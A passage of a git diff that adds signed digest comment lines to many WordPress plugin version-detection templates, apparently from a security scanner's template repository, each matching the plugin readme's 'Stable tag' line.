490a00463044022073ad9ae3f3b600d69ecb24ee431df67879963efc1fff39853fb05ecf60d9247002205e0e939684614a206a9eb6b6103566f2097cfb006a10f6bfae37afaca6dcbf89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..3b0eb0b009 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203d4a8f7c82d949016c4694606d48607b65af17fb47fcc637f1b8b81b4f5cae4e02205ae1ec5505052c1c77d069441a9db2276c8ac2fc4cacb0488a552b054ad127dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..faeb44bafd 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203271ec9687a8e793bf77780b88811e053b787fc5c43d90e2609fdc97953e6e1b022014c579674d60e77df7091cce99c357d8a167e38c03ef6137ee29a67bf2696642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..06cd52ef76 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008cad2fb98895fa0e68f90230b4f7608a43b996c414e29928de147ff9fced2cdd02206b41fc9e81a8afa425aa2e8885f01fc8d195e6f9059027adfcc7653cf4b72a5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 196cc7e8e8..2cc9e4fe8a 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a33dd9e05dc4d319c939ff8c22e330cb4315f5514530ef4def02de2ba4386195022100c32e1bbdd17a3309fdde3d91e1c3cf7d68696026b10ea52fd9ca79c2cda4fd8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 55362630df..82e031b36f 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004146523b6d25b5b01c1b5cea9a3a070c7ec3e0039ab6929237c11e91c12c7060220392366b25d7541ef75519e8e45800913c5383b992923d9b438e23803f5b431bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..c9c11f688c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201ba8ef79c897b1404eed19e6c3b2013c60a8da05203a804836adc3481a248631022037d364993ee2af694f117456fcaaad0327f6b74f664897daa1882e07433188b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..6a98f8f16a 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207657cb8e50356e6da431d3749b9582652bfc5ad5ca535587a8cd929f126bac2f022100a1a9cdb3d6247647d407994007ee272ab38dcb65a54c25682fe0a3f095e3ee48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..d03bdbc43e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b6fb6132bd351136c7a668443662e53ebc75ab764610a36877e7da010cc89f1022100c40d801f49b42c53191b46cfaac3255772ff19e76d505bb81e4c8eedd5ab2075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..1c30b9f02f 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a85fa2a7ce6c0853f7f36527568be5f0e336aa227174e02ef8accd39bf46d84a022100b89374c7bc325172aa76a6db5dc42b34311d64d19c495e49b78f76cbcbce43f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..3606e3dd6d 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204dfbc41d6dd86929d2a6363d7d2b95b010fdeb7c890ed3b44e80e69ca6b3b10402207415c502c8148e10ac92d254c2af200f7f5f0e4cefea9463327fc8a864b4b5e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index f76b750bf6..3c87a5b93c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c4c9b0c974ea1b52edff7ae1adbd80ac1f9877647e57c60a06c62e914e8e25702203a1e343fd53e9946a57d250383a0d102fd30d9960153bc7b385ff0b6be763c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..d0e4dc0c63 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b669f309e687aec3e31ad7018572802ce45a77e23661bc1db614b41f0d9eee902200f21f7d302bd954087fe247ce0050ddb159d1afce744aa4375f4e7cf0b7ec594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index d1e01c329b..a8e36ff545 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200bcaffd2ba18d13ecfe0294556138455ccff053616017717f84fd218447af878022055bf9abf7d5f2fc3cd902c461291a4d0735cae1880a638d59dbc094a5355f73d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..67e612036b 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ebdc031f27e864c22c5971549204d03abc4175922047a6cebc8ea3a0d2d5a1bc02201dee591f4e3340aa846cf161c3179b6ba011c66290c63b5c8c58444c2d3b4481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..b4831038a9 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003200d1425abf3dc81fe7a1d8596b8bb5b70222aa001bd0043896425a1fbc15202202655661d8946291b42260603b12ce357c22a15718375d95277ca05efb30a9eb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..59566592d2 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220347b19480b30e8714d0eac74dce84cd65e3da993a4574f1bfcb7605fb651cd9502205af71795e14368c4737f26a38d30f11db1fbecde0048ce664a5600479474565c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f3aae5f624..65dcdd1dcb 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e33c639124cc0675c85d9420024f8f1a696a7220378bcdebdf7e7a8254313403022066808a5ac5b3e1ddc9aaaab8199899fb7935100a73b5acae41920428ab39bde7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..3c8ab6d382 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b84ee062a79650a89a22dc814fbcc73eff6a15d49cc320d61e31f29a1adcb3a022100cfe29e8552cc483fef94977902527c00a2a98f7dc1a28835763acb619bffbd70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..f423a72bd8 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e9aada81ea3956bbe7c023b4d558dbe9e9b030ab49bf4aabc2a842a6942ed0bc02205c9d3e777d0124871106473a39c9b4b47ec02f4ef6c0c5725195f88ae036caed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..dd865c01e9 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045cff4d4c294f55aa5faf268d7676a6a5faa0b26ab26c6b0a054ef42e387e0c602204e11ab28a07485fb9c23f407a4bfc9f8a0d115acf54dacc2fd0b3b35b63c77d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..bf1d053ae6 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0be34b5a53b1b813f5d1370b926c04335cee580d02993b3c1b36abd881a618b02200fc072be33753ad0fd8f27bd743783e719c64bd8634da17a7068a6c3ed57f46d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..38c4f6ca7f 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220275bc1a99d3b7a316b58788d2c4e8bb9019ab8e99b6ac6d7fb7c3e513bd191df0220658e25253eeff22882da1a1e1b15cd6898b0aeb2c0b7c3d6db80980ece740f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..f4104ee1ba 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022065d03f763f3dc7de2856cb625ce5fba3c24562885f428a14a7b519d5d634bf4c022100ebbbb6f8ffb60fdf791f5c2887b2b8a817bf125a05371a5c2b0ec0ebeb06204b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..9c7750c412 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b69977e7517ae20c140d5b9bb49d357d25755c5f999b9361ebe4d5713bc69e530220202a8e993f19166528de0636b9e8839594463a56c2add8acf9046b97c7f27be9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..ee50416117 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa7afda8bd39aab2688910f3e0bb686a91277568d6403303263df20d93ca11350221008b1d9326d6a156653e4f7487c4e6e8a8b3ff6390f6443e5bc5638abb105261c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..5d38e834d2 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202f88ddb878b042adc5455a8656385dfac23e23a39af822824dd1db29517aa8c202203fdaed9c806961338ac725b4f28df298ba9af14a2f6b8c1695aeeb4c0edaee8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..39e5f2ce55 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b7a837750b6cb54c1acb94592a54008ab06bb1ca89f7e56cdb974b96dc4ef7602205c219ea77996fd192f117195c9fbbc43d5c2285b8d361aab29e7b41d3efc301c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..ccec98a8fa 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100812a2e2d46de5040f1681354235fe190b0ef22fc76b4be6bc092d7f03408892e0220317f8e0d347519f225dfe3266673a71e78f26ac630713d7057ccf8e887d29a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..abb83127b6 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d5a0577d666c6d48c42e758b76d55dc5f42554e5ed9916841b954eeb4b9f974022100c81b4881a91d228da7efd66768ffa915f8a92ff3cb7a5c0a808cc3713779a988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index d94b4228a9..3ec8e90a1c 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210085f6d6813aaecb8f703a22ba653fff18978c8e887a65204873769f35568520d6022100f380d09926f7cd371cdd6e3b3a4124ae03b4259d1fd5eb95088b1c83efe3fb38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..07193ea748 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100960159075ea286ffca640edc35ab5d25d11b292ff5f98763712af0951aed9650022100f09beda83e4ba8bcc95bc7c8fea83a5091b4915449598fa44bfdc7b7a6e2194e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index 1b4769d0a7..7b360c0ebf 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009aa63d26163a7324d8648de64e96c764cf0fc62f6020c11ab43e653c10bf5c05022100cf28d21ce594945c548e99dacb263e3d614337ce17ca57bcda17f27ed19b0b37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index c2cd4ede1b..34bbc7b4dc 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d2cea40cb6ec215d083caf423b3a634e8376f8d196716fcc603708452e792c07022100ee7cd72e3d2c3e24fc3888f2d25507a59de9157560d1f531fcccb5b6ce66701e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 03e6c13ec5..c6caa779e1 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e160dbf971e26bac25b538564d8d080a9e5aed3b21c47b5b1b80bc8e0a9116f1022100eb26d0be9696e9aedeabaddfa5db4fddb844f671d4cda6b862fc5fcd5d140a27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..575bbb96cd 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a0dd3c607a0ffec858011cda7b84a22de628e39675adf8d3cdf910011f585ef02203a085179d0f2e492d43b2f3882a0a67986e53ff8633737dd524f87097d1988dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..4494590437 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a17fdf49e06a3e012c210b315a8773944ed3c74e142581617e415717d7b1499022100e984597e08e1c2a0403fa69acec3cbfaeab4dff6607697ec0bac6563875528a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..6faa03677e 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7ceaebf1d0af2e978e23c9837aba331b07cc0c2d4d8c2ae10caa72cc50cda7502202ac6a5fc60c4853acb66c0c9c9e9b59c0a38a05779c148b70d58be1c61a512bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..81a0f9b0ba 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210095b3371627164e73684841d9dd61d08c7992af18114f3a9feeee43f14f167ccc022100ec22fc7d5aa8cd9543e6f097cd0a568c3ea3dfb87df9204f6c81d1a2ed14285d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..fff8099307 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009adaf081a68546a76384cc8eb28321e8b5c1cc40bba6d0e698f3114ddb5402b202201c4751096cbe9733304d4414e226e5c21c542c81792ee2a373e21c778d0e7a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..f77bba46ff 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047058676cd7c2ddc1af1011c26393fb627895dbfbdae84ddc093e45f0239dc7e022067345712faf718b018a5b3e282d6456c8c0bb228bd191cee65904ec1cd25b5fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..fa0529a971 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8bad2c53d903c27e72ca0d36ec67e578f9e9326fd237d4ad0c6bce1956e494802205af09b11aefbe945c448573c4b8ffb796ba3940824ecc5bf09ae7be948cae834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index d74de07e8e..768c5be417 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017923fc42f92da4b14f291f24497fb5be5a94759a577571d2bb11515156e1215022071ba0c03219ac05a22d394d24b108eba3ef50552c23f974f5ac6fba0c631d12c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index e5cfe47925..7f5be09440 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220563074ddd8e4bb4398a726b195d130da53578a0156063603dab2da76393a88fb02207810fc3988d7c8ae20dd3d3be7863859e8942547ff70d82ce1bf24b1cfffbbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..e2ca97ae58 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055a55cf56bec0f9e1c8e02b9fa7089d5d5aa02b2fa59e8426ee4a9b5103950b402204849a4bde1fa93016865a08e04799ded56920b1ecb52d05bd5dd4ae6336d843c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..9b59edeef4 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e91e35f75fb5bc9f322dff531b80b708415e8f97104073ec700aaf22e604429c0220544de4f34e9728bf131db8c2939a6b2306f44ae0254d7d8432dda826270b72b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..434ad9d715 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9eafa68df5112a2d4b5ee2050eee28412c6e785ea6ff67a10e652b4adcc2d95022100ae6beb78c6a17cd1f49470fc5a626aee0b147486a6b64a84b280e804cfa58a5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..ec227e1305 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 